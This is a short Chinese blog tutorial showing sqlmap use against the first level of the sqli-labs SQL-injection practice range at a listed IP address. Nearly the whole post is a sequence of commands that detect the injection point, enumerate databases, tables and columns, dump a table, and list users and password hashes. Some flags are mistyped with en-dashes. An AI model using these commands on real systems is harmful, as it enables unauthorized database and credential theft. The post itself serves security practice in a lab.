赞
踩
目录
原来sql注入如此简单
以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有图中白色背景的 则判断出有注入点
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五个表
选取一个challenges数据库,获取此库的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables
选取表T5M0QG6FM2,获取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用该命令就可以列出所有管理用户
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db
可以看到当前的数据库是 security
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
当前用户是root
欢迎小伙伴一键三连,后期陆续分享编程与安全的知识,一起成长,你我共勉 !
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。